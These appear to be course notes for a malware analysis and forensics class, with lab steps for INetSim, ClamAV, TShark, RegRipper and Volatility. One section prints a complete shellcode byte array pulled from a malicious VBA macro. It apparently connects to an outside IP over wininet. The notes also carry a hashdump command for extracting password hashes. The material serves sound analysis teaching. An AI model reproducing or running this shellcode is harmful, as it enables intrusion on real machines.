Malware Analysis and Reverse Engineering (IAM302)

Topic 1: Introduction
Topic 2: Fundamentals of malware analysis
Topic 3: Malware classification
Topic 4: Examining AV signature
Topic 5: Customizing AV database
Topic 6: MA sandboxes
Topic 7: AV scanners
Topic 8: Review & progress test
Topic 9: Malware Lab Integrity
Topic 10: Recipe Manipulating HTTP/HTTPS
Topic 11: Cloning and imaging disks
Topic 12: Dynamic analysis tools
Topic 13: Malware forensics
Topic 14: Identifying packers
Topic 15: Registry forensics
Topic 16: Case studies
Topic 17: Malware debugging
Topic 18: JIT debugger for shellcode analysis
Topic 19: Memory forensics
Topic 20: Course Review

Labs

Config inetsim.conf

#service_bind_address 10.10.10.1 → service_bind_address 0.0.0.0
#dns_default_ip 10.10.10.1 → dns_default_ip 192.168.56.105
Run commands: $inetsim to start and Ctr + C to stop INetSim service
Note: remember to restart the inetsim service after editing as above

How to install and use ClamAV on Ubuntu-based OS

Install: sudo apt-get install clamav (done!)
Update the virus database: freshclam
Scan current position: clamscan
Scan with infected, remove, and recursive switches:
- clamscan --infected: to only report infected files, and you don’t want to remove them
- clamscan --remove: to remove infected files
- clamscan --recursive or - clamscan -r: to scan a directory and all of its subdirectories
Some helpful examples
- Scan the current directory and all of its subdirectories for infected files and report them to the standard output: clamscan --recursive --infected .
- Scan the current directory and all of its subdirectories for infected files and remove them: clamscan --recursive --remove .
- Scan only files with the extension .txt: clamscan --include='.*\.txt$' /path/to/scan
- Scan all files but exclude files with the extension .log: clamscan --exclude='.*\.log$' /path/to/scan

Decode the dumping file to a executable file

#!/share/local/bin/python
data2 = b''
dumpfile = open("dump3")
data = dumpfile.read()
data2 = data.split(",")
dumpfile.close()
finalfile = open("final_file.bin", "wb")
for i in range(len(data2)):
        finalfile.write(bytes(chr(int(data2[i])).encode('latin')))
finalfile.close()

Converting the VBA array into a Python list

import struct

myList = [-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100, -117, 82, 48, -117, 82, 12, -117, 82, 20, -117, 114, 40, 15, -73, 74, 38, 49, -1, 49, -64, -84, 60, 97, 124, 2, 44, 32, -63, -49, 13, 1, -57, -30, -16, 82, 87, -117, 82, 16, -117, 66, 60, 1, -48, -117, 64, 120, -123, -64, 116, 74, 1, -48, 80, -117, 72, 24, -117, 88, 32, 1, -45, -29, 60, 73, -117, 52, -117, 1, -42, 49, -1, 49, -64, -84, -63, -49, 13, 1, -57, 56, -32, 117, -12, 3, 125, -8, 59, 125, 36, 117, -30, 88, -117, 88, 36, 1, -45, 102, -117, 12, 75, -117, 88, 28, 1, -45, -117, 4, -117, 1, -48, -119, 68, 36, 36, 91, 91, 97, 89, 90, 81, -1, -32, 88, 95, 90, -117, 18, -21, -122, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, -1, -43, 49, -1, 87, 87, 87, 87, 87, 104, 58, 86, 121, -89, -1, -43, -23, -124, 0, 0, 0, 91, 49, -55, 81, 81, 106, 3, 81, 81, 104, 74, 29, 0, 0, 83, 80, 104, 87, -119, -97, -58, -1, -43, -21, 112, 91, 49, -46, 82, 104, 0, 2, 64, -124, 82, 82, 82, 83, 82, 80, 104, -21, 85, 46, 59, -1, -43, -119, -58, -125, -61, 80, 49, -1, 87, 87, 106, -1, 83, 86, 104, 45, 6, 24, 123, -1, -43, -123, -64, 15, -124, -61, 1, 0, 0, 49, -1, -123, -10, 116, 4, -119, -7, -21, 9, 104, -86, -59, -30, 93, -1, -43, -119, -63, 104, 69, 33, 94, 49, -1, -43, 49, -1, 87, 106, 7, 81, 86, 80, 104, -73, 87, -32, 11, -1, -43, -65, 0, 47, 0, 0, 57, -57, 116, -73, 49, -1, -23, -111, 1, 0, 0, -23, -55, 1, 0, 0, -24, -117, -1, -1, -1, 47, 116, 97, 79, 56, 0, -21, 16, 49, -71, -117, 51, 127, -117, -33, 54, 31, -69, -19, 48, 21, -37, -56, -107, -59, 23, -88, -63, 0, -104, -116, -51, -104, 65, -48, -118, -80, 62, 123, -103, -51, -124, -11, -27, 50, 17, -77, -115, 98, 29, 106, -71, -108, 35, 99, -94, 70, 89, -41, 14, -9, 114, -126, -101, -95, -16, -75, 44, 28, 59, -70, 123, -27, 55, 63, -86, 8, 66, -3, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 52, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 59, 32, 77, 83, 73, 69, 32, 55, 46, 48, 59, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 48, 41, 13, 10, 0, 62, 73, 5, 8, -70, 26, -68, 95, 117, -58, -111, -107, 21, 47, -40, -43, 89, 118, 112, -18, 17, 116, -104, 95, 44, -45, -100, -125, 106, 75, -7, -57, 92, -90, -44, -128, -53, 22, -20, 101, 119, -65, -69, -87, 29, 90, 118, 66, 24, 20, -60, 86, -86, -69, 89, 56, 15, 74, 78, 113, 44, 73, -16, -52, -119, 13, 5, -24, -71, -64, 127, -79, -61, -126, -53, -105, -7, 76, -108, -60, -75, 41, -101, -61, -14, -10, 65, 120, -70, -117, -120, 55, -110, 51, 94, -73, -52, 82, -66, 10, -103, -105, -92, 32, -44, 8, -88, 126, 14, 75, -29, -72, -19, -87, 5, -61, 7, -109, -41, 23, -91, -116, 41, 24, -84, -47, 6, -99, 110, -117, 78, -47, 1, -112, -55, 29, 110, 32, 30, -83, 107, -101, 65, 111, -73, 113, -100, 64, -117, -103, -117, -30, 73, 102, 66, 76, -3, -51, 56, -66, -33, -73, -2, -5, -116, 17, 71, 75, 39, 61, 69, -44, 48, 5, -28, 108, -42, -58, -116, -5, 112, 42, -91, -69, 30, -90, 46, -20, -50, -18, -37, -54, -125, -27, 90, 30, 106, 62, -73, -88, 102, -113, 105, 116, 96, -101, 73, -9, -15, -8, 20, -125, -63, -7, 15, -124, 49, 6, -61, -87, 24, -84, 72, -113, 38, 32, 0, -30, 5, 124, 52, 18, -99, 46, 11, 56, -9, -14, 0, 104, -16, -75, -94, 86, -1, -43, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 87, 104, 88, -92, 83, -27, -1, -43, -109, -71, 0, 0, 0, 0, 1, -39, 81, 83, -119, -25, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, -106, -119, -30, -1, -43, -123, -64, 116, -58, -117, 7, 1, -61, -123, -64, 117, -27, 88, -61, -24, -87, -3, -1, -1, 52, 55, 46, 57, 51, 46, 54, 51, 46, 49, 55, 57, 0, 18, 52, 86, 120]

shell_code = open("shellcode.bin", "wb")
for i in myList :
	shell_code.write(struct.pack('b', i))
shell_code.close()

Install FOG server

https://docs.fogproject.org/en/latest/installation/server/install-fog-server/
Reset WebUI FOG password
- If the root user in MySQL does not have a password (or it’s stored in ~/.my.cnf): sudo mysql -u root fog
- If the root user in MySQL does have a password: sudo mysql -u root -p fog
- Run this query to reset the password: UPDATE users SET uPass = MD5('password') WHERE uName = 'fog'; exit;

Capturing packets with Tshark via Python

Python 2.7.18 (default, Jul  1 2022, 10:30:50) 
[GCC 11.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from analysis import TShark
>>> cap = TShark("/tmp/mu.pcap")
>>> cap.start("enp0s3","10.0.2.15")
>>> Running as user "root" and group "root". This could be dangerous.
Capturing on 'enp0s3'
 ** (tshark:4588) 15:59:30.271227 [Main MESSAGE] -- Capture started.
 ** (tshark:4588) 15:59:30.271861 [Main MESSAGE] -- File: "/tmp/mu.pcap"
22 
>>> cap.stop()
>>> print cap.read()
>>> quit()

Output:

[REMOVED]
===================================================================
IP Addresses     value     rate          percent
-------------------------------------------------------------------
192.168.1.141      90       0.014359     100.00%
8.8.8.8            40       0.006382     44.44%
91.189.90.40       12       0.001915     13.33%
63.245.209.93      10       0.001595     11.11%
96.17.106.105      28       0.004467     31.11%
[REMOVED]

Discovering alternative data streams with TSK

Create an ads: echo "this is a message" > host.txt:stream, or: notepad host.txt:stream
Read or modify the streame:
- notepad host.txt:stream
- more < host.txt:stream
- dir /R
- streams64 host.txt (the Sysinternals Streams utility)
PowerShell 3.0, which includes six cmdlets to directly manipulate content for ADS
- Finding: Get-Item .\host.txt -stream *
- Reading: Get-Item .\host.txt | Get-Content -Stream stream
- Reference: Friday Fun with PowerShell and Alternate Data Streams

Registry Forensics with RegRipper plug-ins

Here’s a list of the registry hives present in almost all Windows systems:
- HKEY_CURRENT_CONFIG: supported by the System, System.alt, System.log, and System.sav files
- HKEY_CURRENT_USER: supported by the Ntuser.dat and Ntuser.dat.log files
- HKEY_LOCAL_MACHINE\SAM: supported by the Sam, Sam.log, and Sam.sav files
- HKEY_LOCAL_MACHINE\Security: supported by the Security, Security.log, and Security.sav files
- HKEY_LOCAL_MACHINE\Software: supported by the Software, Software.log, and Software.sav files
- HKEY_LOCAL_MACHINE\System: supported by the System, System.alt, System.log, and System.sav files
- HKEY_USERS\.DEFAULT: supported by the Default, Default.log, and Default.sav files
In digital forensics, these registry hives can tell investigators:
- HKEY_CURRENT_CONFIG: acts as a pointer or shortcut to a registry key containing information about the computer’s hardware profile
- HKEY_CURRENT_USER: contains the computer settings the current user prefers (e.g., what software he/she typically uses)
- HKEY_LOCAL_MACHINE\SAM: contains local user account and local group membership information, including passwords. It also tells you what privileges are granted (e.g., what files they can access) to each user and group in the Active Directory
- HKEY_LOCAL_MACHINE\Security: contains local system security policy settings that control which domains are trusted to authenticate login attempts, which users are allowed to access the system, on what channels users are permitted to access the system, which privileges are assigned to a user, how users are audited, and login information for cached domain and service logins
- HKEY_LOCAL_MACHINE\Software: contains most of the configuration information for the software installed on the computer and the OS
- HKEY_LOCAL_MACHINE\System: contains the same information as HKEY_LOCAL_MACHINE\Software
- HKEY_USERS\.DEFAULT: contains the registry settings used as the default for the currently logged-in user. If that user doesn’t have an existing profile, the C:\Users\Default\ntuser registry hive will get called
Windows Registry Forensics
- Determining installed product information: perl rip.pl -r software -p product
- Determining the product type: perl rip.pl -r system -p producttype
- Determining the Windows version: perl rip.pl -r software -p winver
- Determining the network cards used: perl rip.pl -r software -p networkcards
- Determining the DHCP information: perl rip.pl -r system -p nic
- Determining the wireless access points information: perl rip.pl -r software -p ssid
- Determining the shutdown time: perl rip.pl -r system -p shutdown
- Determining the time zone: perl rip.pl -r system -p timezone
- Determining all installed applications: perl rip.pl -r software -p uninstall
- Determining user SIDs: perl rip.pl -r software -p profilelist
- Determining the recent documents used: perl rip.pl -r NTUSER.DAT -p recentdocs
- Extracting information from the winlogon key: perl rip.pl -r software -p winlogon
- Determining suspect’s web-browsing history: perl rip.pl -r NTUSER.DAT -p typedurls
- Collecting information about unread emails: perl rip.pl -r NTUSER.DAT -p unreadmail
- Determining applications set to auto start: perl rip.pl -r NTUSER.DAT -p user_run
- Determining the value of the userinit registry key: perl rip.pl -r software -p userinit
- Determining the user’s printers: perl rip.pl -r NTUSER.DAT -p printers
- Collecting information about Cain & Able: perl rip.pl -r NTUSER.DAT -p cain

Install volatility on CentOS 7

Download: https://forensics.cert.org/cert-forensics-tools-release-el7.rpm
Run following commands:
- yum install epel-release.noarch
- rpm -Uvh cert-forensics-tools-release-el7.rpm
- yum --enablerepo=forensics install Volatility
- yum --enablerepo=forensics install Volatility
Check: volatility -h

Memory dump & analysis tools

Image Information: volatility imageinfo -f memdump.mem
Running Processes: volatility pslist --profile=Win2008SP1x86 -f memdump.mem
Console Commands: volatility consoles --profile=Win2008SP1x86 -f memdump.mem
Services: volatility svcscan --profile=Win2008SP1x86 -f memdump.mem
Network Connections: volatility netscan --profile=Win2008SP1x86 -f memdump.mem
Registry Hives: volatility hivelist --profile=Win2008SP1x86 -f memdump.mem
- Virtual addresses of the SAM and SYSTEM hives: 0x89c33450 and 0x86226008
Password Hashes: volatility hashdump --profile=Win2008SP1x86 -f memdump.mem -y 0x86226008 -s 0x89c33450 (Free Password Hash Cracker)

Book

James Aquilina, Cameron Malin, Eoghan Casey. Malware Forensics: Investigating and Analyzing Malicious Code, Syngress Publing © 2008.
Michael Hale Ligh, Steven Adair, Blake Hartstein, and Matthew Richard, Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code, Wiley Publishing © 2011 (ISBN: 978-0470613030).
Michael Sikorski, Andrew Honig. Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software, No Starch Press © ISBN: 978-1-59327-290-6, 2012.

URLs

Course Implementation Plan (old version)

Session 1: Course Overview
Session 2: Overview of Malware and Malware Analysis
Session 3: Basic Dynamic Analysis
Session 4: Basic Static Technique
Session 5: Assembly Language Overview
Session 6: IDA Pro
Session 7: Analyzing Malicious Windows Programs
Session 8: Windows Internal and API
Session 9: Debugging
Session 10: Malware Analysis with OllyDbg and Windbg
Session 11: Kernel Debugging with Windbg
Session 12: Malware Behaviour and Mechanism
Session 13: Convert Malware Launching
Session 14: Malware stealth technique
Session 15: Mobile Malware